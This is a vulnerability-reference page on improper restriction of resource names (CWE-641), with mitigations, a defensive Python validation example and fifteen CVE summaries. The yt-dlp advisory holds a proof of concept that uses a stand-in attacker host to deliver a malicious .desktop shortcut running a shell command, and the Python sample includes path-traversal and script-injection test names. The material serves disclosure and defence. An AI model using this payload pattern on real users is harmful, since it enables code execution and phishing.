cvekit

CWE-641

Improper Restriction of Names for Files and Other Resources

Abstraction: Base | Status: Incomplete | Structure: Simple | 15 CVEs
The product constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name.

Extended description

This may produce resultant weaknesses. For instance, if the names of these resources contain scripting characters, it is possible that a script may get executed in the client's browser if the application ever displays the name of the resource on a dynamically generated web page. Alternately, if the resources are consumed by some application parser, a specially crafted name can exploit some vulnerability internal to the parser, potentially resulting in execution of arbitrary code on the server machine. The problems will vary based on the context of usage of such malformed resource names and whether vulnerabilities are present in or assumptions are made by the targeted technology that would make code execution possible.

Common consequences (2)

  • Integrity, Confidentiality, Availability: Execute Unauthorized Code or Commands

    Execution of arbitrary code in the context of usage of the resources with dangerous names.

  • Confidentiality, Availability: Read Application Data; DoS: Crash, Exit, or Restart

    Crash of the consumer code of these resources resulting in information leakage or denial of service.

Potential mitigations (3)

  1. Architecture and Design

    Do not allow users to control names of resources used on the server side.

  2. Architecture and Design

    Perform allowlist input validation at entry points and also before consuming the resources. Reject bad file names rather than trying to cleanse them.

  3. Architecture and Design

    Make sure that technologies consuming the resources are not vulnerable (e.g. buffer overflow, format string, etc.) in a way that would allow code execution if the name of the resource is malformed.
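The three mitigations above in code, as an added example that is not part of the CWE entry or of any project listed on this page: an allowlist check on the incoming name that rejects instead of cleansing (with the bypassable single-pass "cleanse" shown beside it as the weak contrast), a second containment check immediately before the resource is consumed, and the case where the file extension is derived from an untrusted URL, the pattern behind the yt-dlp entry further down. The storage root `/srv/uploads`, the extension allowlist, the function names and every sample name are hypothetical.

```python
"""Allowlist validation of externally supplied resource names (CWE-641).

Added example; the storage root, the extension allowlist and the sample
names are hypothetical and not taken from any project on this page.
"""
import os
import re
from urllib.parse import urlsplit

BASE_DIR = "/srv/uploads"                                  # hypothetical storage root
ALLOWED_EXTENSIONS = {"txt", "png", "jpg", "pdf", "vtt"}   # hypothetical allowlist

# One path segment: starts alphanumeric; then letters, digits, '_', '-' or a
# single '.' that is not followed by another '.'. No separators, no '..'.
SAFE_NAME = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9_-]|\.(?!\.))*$")


class BadResourceName(ValueError):
    """Raised when a name fails the allowlist. The name is never rewritten."""


def cleanse_name(name: str) -> str:
    """The 'cleanse' strategy the second mitigation argues against.

    A single strip of a known-bad token is bypassable: '....//etc/passwd'
    turns into '../etc/passwd' after one pass. Kept only as the weak contrast.
    """
    return name.replace("../", "")


def validate_name(name: str) -> str:
    """Allowlist validation at the entry point: reject, do not cleanse."""
    if not 1 <= len(name) <= 64 or not SAFE_NAME.fullmatch(name):
        raise BadResourceName(f"rejected name: {name!r}")
    ext = name.rpartition(".")[2].lower() if "." in name else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise BadResourceName(f"rejected extension: {name!r}")
    return name


def resolve_under_base(name: str, base_dir: str = BASE_DIR) -> str:
    """Second check, just before the resource is consumed: the resolved path
    must stay inside base_dir even if the entry-point check was skipped.
    Assumes a POSIX filesystem; realpath also follows symlinks."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise BadResourceName(f"escapes {base_dir}: {name!r}")
    return target


def derive_extension(url: str) -> str:
    """Extension exactly as an attacker-influenced URL presents it (untrusted)."""
    last = urlsplit(url).path.rsplit("/", 1)[-1]
    return last.rpartition(".")[2].lower() if "." in last else ""


def name_from_untrusted_url(stem: str, url: str) -> str:
    """Build an output name whose extension comes from an untrusted URL.
    The extension is used only if it is on the allowlist; otherwise the
    whole write is refused rather than the name being 'fixed up'."""
    return validate_name(f"{stem}.{derive_extension(url)}")


def check(fn, *args) -> bool:
    """True if fn(*args) passes the checks, False if it raises BadResourceName."""
    try:
        fn(*args)
        return True
    except BadResourceName:
        return False


if __name__ == "__main__":
    samples = [                               # constructed inputs
        "report.pdf",                         # accepted
        "../etc/passwd",                      # traversal
        "....//etc/passwd",                   # survives a single cleanse pass
        "<script>alert(1)</script>.png",      # scripting characters in the name
        "MyVideo.en.desktop",                 # shortcut extension taken from a URL
    ]
    for s in samples:
        print(f"{s!r:36} cleanse -> {cleanse_name(s)!r:24} allowlist -> {check(validate_name, s)}")
    print(check(name_from_untrusted_url, "MyVideo.en", "http://attacker/subs.vtt"))
    print(check(name_from_untrusted_url, "MyVideo.en", "http://attacker/payload.desktop"))
```

The two checks are deliberately separate: `validate_name` runs where the name enters the system, `resolve_under_base` runs where it is used, so that a code path which forgets the first check is still caught by the second, which is what the second mitigation means by validating "at entry points and also before consuming the resources".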

Relationships (1)

CVEs referencing this CWE (15)

Each entry gives the CVE, its description, severity with score, EPSS probability with percentile, any flags, and the last-modified date.
CVE-2020-36326

  PHPMailer 6.1.8 through 6.4.0 allows object injection through Phar Deserialization via addAttachment with a UNC pathname. NOTE: this is similar to CVE-2018-19296, but arose because 6.1.8 fixed a functionality problem in which UNC pathnames were always considered unreadable by PHPMailer, even in safe contexts. As an unintended side effect, this fix eliminated the code that blocked addAttachment exploitation.

  Severity: CRITICAL (9.8) | EPSS: 3.10% (p86) | Modified: 2024-11-21
CVE-2021-41146

  qutebrowser is an open source keyboard-focused browser with a minimal GUI. Starting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers a `qutebrowserurl:` URL handler. With certain applications, opening a specially crafted `qutebrowserurl:...` URL can lead to execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`. Only Windows installs where qutebrowser is registered as URL handler are affected. The issue has been fixed in qutebrowser v2.4.0. The fix also adds additional hardening for potential similar issues on Linux (by adding the new --untrusted-args flag to the .desktop file), though no such vulnerabilities are known.

  Severity: HIGH (8.8) | EPSS: 1.45% (p70) | Modified: 2024-11-21
CVE-2026-25177

  Improper restriction of names for files and other resources in Active Directory Domain Services allows an authorized attacker to elevate privileges over a network.

  Severity: HIGH (8.8) | EPSS: 1.24% (p65) | Flags: PoC | Modified: 2026-06-19
CVE-2024-30063

  Windows Distributed File System (DFS) Remote Code Execution Vulnerability

  Severity: MEDIUM (6.7) | EPSS: 1.02% (p59) | Modified: 2025-12-17
CVE-2023-0046

  Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch.

  Severity: HIGH (7.2) | EPSS: 1.02% (p59) | Modified: 2025-04-09
CVE-2022-23536

  Cortex provides multi-tenant, long term storage for Prometheus. A local file inclusion vulnerability exists in Cortex versions 1.13.0, 1.13.1 and 1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the Alertmanager Set Configuration API. Only users of the Alertmanager service where `-experimental.alertmanager.enable-api` or `enable_api: true` is configured are affected. Affected Cortex users are advised to upgrade to patched versions 1.13.2 or 1.14.1. However as a workaround, Cortex administrators may reject Alertmanager configurations containing the `api_key_file` setting in the `opsgenie_configs` section before sending to the Set Alertmanager Configuration API.

  Severity: MEDIUM (6.5) | EPSS: 0.75% (p50) | Modified: 2025-04-16
CVE-2025-21361

  Microsoft Outlook Remote Code Execution Vulnerability

  Severity: HIGH (7.8) | EPSS: 0.73% (p49) | Modified: 2026-06-09
CVE-2025-21402

  Microsoft Office OneNote Remote Code Execution Vulnerability

  Severity: HIGH (7.8) | EPSS: 0.65% (p46) | Modified: 2026-06-09
CVE-2025-47173

  Improper input validation in Microsoft Office allows an unauthorized attacker to execute code locally.

  Severity: HIGH (7.8) | EPSS: 0.54% (p41) | Modified: 2026-02-26
CVE-2022-36302

  File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information.

  Severity: MEDIUM (5.4) | EPSS: 0.51% (p39) | Modified: 2024-11-21
CVE-2025-47953

  Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

  Severity: HIGH (8.4) | EPSS: 0.48% (p38) | Modified: 2026-05-22
CVE-2024-45312

  Overleaf is a web-based collaborative LaTeX editor. Overleaf Community Edition and Server Pro prior to version 5.0.7 (or 4.2.7 for the 4.x series) contain a vulnerability that allows an arbitrary language parameter in client spelling requests to be passed to the `aspell` executable running on the server. This causes `aspell` to attempt to load a dictionary file with an arbitrary filename. File access is limited to the scope of the overleaf server. The problem is patched in versions 5.0.7 and 4.2.7. Previous versions can be upgraded using the Overleaf toolkit `bin/upgrade` command. Users unable to upgrade may block POST requests to `/spelling/check` via a Web Application Firewall, which will prevent access to the vulnerable spell check feature. However, upgrading is advised.

  Severity: MEDIUM (5.3) | EPSS: 0.48% (p37) | Modified: 2024-09-25
CVE-2024-47260

  51l3nc3, member of the AXIS OS Bug Bounty Program, has found that the VAPIX API mediaclip.cgi did not have sufficient input validation, allowing more audio clips than designed to be uploaded and resulting in the Axis device running out of memory. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.

  Severity: MEDIUM (6.5) | EPSS: 0.37% (p28) | Modified: 2026-04-15
CVE-2019-25623

  Luminance Studio 2.17 contains a denial of service vulnerability that allows local attackers to crash the application by providing malformed input through the keyboard interface. Attackers can create a text file with arbitrary character sequences and trigger the application to process the input, causing the application to become unresponsive or terminate abnormally.

  Severity: MEDIUM (5.5) | EPSS: 0.19% (p8) | Modified: 2026-03-24
CVE-2026-50023

  Summary

  A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as `.desktop`, `.url`, `.webloc`) to the user's filesystem, bypassing the remediation for `CVE-2024-38519`.

  Details

  The fix for `CVE-2024-38519` enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as `.exe` or `.sh`) during file downloads. However, this allowlist explicitly included the unsafe extensions `.desktop`, `.url`, and `.webloc` so that the functionality of the `--write-link` option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download. Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an `EXT-X-MEDIA:TYPE=SUBTITLES` tag with a malicious URI (e.g., `URI="http://attacker/x.desktop"`), which would result in yt-dlp writing the attacker-controlled content to a file with a `.desktop` extension if the user had passed the `--write-subs` option. Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments. While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.

  Proof of Concept

  1. Start a malicious server: Host a malicious `master.m3u8` manifest that points to malicious subtitle payloads:

  ```m3u8
  #EXTM3U
  #EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"
  ```

  And host the `payload.desktop` file with malicious content:

  ```ini
  [Desktop Entry]
  Type=Application
  Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
  Name=Subtitle
  ```

  2. Trigger the download: In this case, the generic extractor triggers the exploit if the `--write-subs` option is used:

  ```bash
  yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"
  ```

  Result: yt-dlp writes `MyVideo.en.desktop` to disk, containing the attacker payload.

  Patches

  yt-dlp version 2026.06.09 fixes this issue by removing `.url`, `.desktop` and `.webloc` from the global file extension allowlist, and by only allowing those file types to be written from within the context of the `--write-link` options' functionality.

  Workarounds

  It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible. Users who are not able to upgrade should do ALL of the following:

  - Only pass fully trusted input URLs to yt-dlp
  - Do not use the `--write-subs`, `--write-auto-subs`, `--embed-subs`, `--write-thumbnail`, `--write-all-thumbnails`, or `--embed-thumbnail` options
  - Use `--format -` to interactively select download formats and validate their file extensions

  Severity: HIGH (8.3) | EPSS: none | Modified: 2026-06-16